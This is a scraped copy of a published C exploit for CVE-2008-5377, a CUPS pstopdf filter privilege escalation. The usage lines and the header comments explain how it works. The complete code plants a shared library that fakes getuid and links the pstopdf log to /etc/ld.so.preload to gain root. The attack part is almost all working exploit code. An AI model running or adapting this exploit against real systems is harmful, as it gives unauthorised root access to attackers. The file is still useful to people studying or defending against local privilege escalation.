Loading ...
Global Do...
News & Politics
71
0
Try Now
Log In
Pricing
1 /* 2 * cve−2008−5377.c 3 * 4 * CUPS < 1.3.8−4 pstopdf filter exploit 5 * Jon Oberheide <jon@oberheide.org> 6 * http://jon.oberheide.org 7 * 8 * Usage: 9 * 10 * $ gcc cve−2008−5377.c −o cve−2008−5377.c 11 * $ ./cve−2008−5377 12 * $ id 13 * uid=0(root) gid=1000(vm) ... 14 * 15 * Information: 16 * 17 * http://cve.mitre.org/cgi−bin/cvename.cgi?name=cve−2008−5377 18 * 19 * pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via 20 * a symlink attack on the /tmp/pstopdf.log temporary file. 21 * 22 * Operation: 23 * 24 * The exploit creates and prints a malformed postscript document that will 25 * cause the CUPS pstopdf filter to write an error message out to its log 26 * file that contains the string /tmp/getuid.so. However, since we also 27 * symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the 28 * error message and malicious shared library path will be appended to the 29 * ld.so.preload file, allowing us to elevate privileges to root. 30 * 31 * Note: 32 * 33 * This exploit only works under the (rare) conditions that cupsd executes 34 * external filters as a privileged user, a printer on the system uses the 35 * pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload 36 * must be world readable. 37 */ 38 39 #include <stdio.h> 40 #include <stdlib.h> 41 #include <strings.h> 42 #include <unistd.h> 43 #include <sys/types.h> 44 #include <sys/stat.h> 45 #include <sys/wait.h> 46 47 int 48 main(void) 49 { 50 int ret; 51 FILE *fp; 52 struct stat log; Page 1/2 CUPS 1.3.84 pstopdf filter Privilege Escalation Exploit Jon Oberheide 12/22/2008 53 54 fp = fopen("/tmp/cve−2008−5377.ps", "w"); 55 if(!fp) { 56 printf("error: cannot open /tmp/cve−2008−5377.ps\n"); 57 goto cleanup; 58 } 59 fprintf(fp, "%%!PS−Adobe−2.0 EPSF−2.0\n( /tmp/getuid.so ) CVE−2008−5377\n"); 60 fclose(fp); 61 62 fp = fopen("/tmp/getuid.c", "w"); 63 if(!fp) { 64 printf("error: cannot open /tmp/getuid.c\n"); 65 goto cleanup; 66 } 67 fprintf(fp, "int getuid(){return 0;}\n"); 68 fclose(fp); 69 70 ret = system("cc −shared /tmp/getuid.c −o /tmp/getuid.so"); 71 if (WEXITSTATUS(ret) != 0) { 72 printf("error: cannot compile /tmp/getuid.c\n"); 73 goto cleanup; 74 } 75 76 unlink("/tmp/pstopdf.log"); 77 ret = stat("/tmp/pstopdf.log", &log); 78 if (ret != −1) { 79 80 printf("error: /tmp/pstopdf.log already exists\n"); 81 goto cleanup; 82 } 83 84 ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log"); 85 if (ret == −1) { 86 printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n"); 87 goto cleanup; 88 } 89 90 ret = system("lp < /tmp/cve−2008−5377.ps"); 91 if (WEXITSTATUS(ret) != 0) { 92 printf("error: could not print /tmp/cve−2008−5377.ps\n"); 93 goto cleanup; 94 } 95 96 cleanup: 97 unlink("/tmp/cve−2008−5377.ps"); 98 unlink("/tmp/getuid.c"); 99 return 0; 100 } 101 102 // milw0rm.com [2008−12−22] Page 2/2 CUPS 1.3.84 pstopdf filter Privilege Escalation Exploit Jon Oberheide 12/22/2008
